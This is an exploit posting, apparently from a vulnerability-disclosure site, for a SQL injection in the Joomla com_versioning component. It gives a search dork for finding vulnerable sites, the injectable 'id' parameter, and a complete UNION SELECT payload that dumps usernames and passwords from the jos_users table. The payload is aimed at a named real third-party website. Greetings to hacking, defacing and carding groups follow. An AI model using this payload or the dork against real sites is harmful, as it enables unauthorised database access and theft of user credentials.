Joomla versioning SQLi Vulnerability

2011.05.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

| Joomla Component com_versioning SQLi Vulnerability | #[~] Author : the_cyber_nuxbie #[~] Home : www.thecybernuxbie.com #[~] E-mail : staff@thecybernuxbie.com #[~] Found : 09 Mei 2011. #[~] Tested : Windows 7 Ultimate 32bit Bajakan. #[!] Dork : inurl:"com_versioning" ______________________________________________________________ [x] X.P.L: ../public_html/index.php?option=com_versioning&sectionid=0&+task=edit&id=[SQLi] <--- Your Skill...!!! - Example Exploits: http://www.bip.wbp.opole.pl/index.php?option=com_versioning&sectionid=0&+task=edit&id=18+AND+1=2+UNION+SELECT+1,2,group_concat%28username,0x3a,password%29+from+jos_users-- - Shout & Greetz: All Member & Staff SekuritiOnline | www.sekuritionline.net All Member & Staff YogyaFamilyCode | www.xcode.or.id All Member & Staff Devilzc0de | www.devilzc0de.org All Member & Staff Hacker-Newbie | www.hacker-newbie.org All Member & Staff ECHO | www.echo.or.id All Member & Staff WhiteCyber | www.whitecyber.net All Member & Staff MuslemHacker | www.muslimhackers.net All Member & Staff BinusHacker | www.binushacker.net All Member & Staff Jasakom | www.jasakom.com All Member & Staff YogyaCarderLink. | www.yogyacarderlink.web.id All Member & Staff IndonesianDefacer | www.indonesiandefacer.org All Member & Staff IndonesianCoder | www.indonesiancoder.com All Member & Staff MagelangCyber | www.magelangcyber.web.id All Member & Staff Jatim-Crew | www.jatimcrew.org All Member & Staff Fast-Hacker | www.fasthacker.org And all forum / community cyber se-antero indonesia. :-D ,etc... Sorry masbro... Aye masih nyubi... :-D Jangan menghina aye donk... :-( Bruakakakakakak... :-D - Mei 09 2011, GMT +09:35 Solo Raya, Indonesia.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top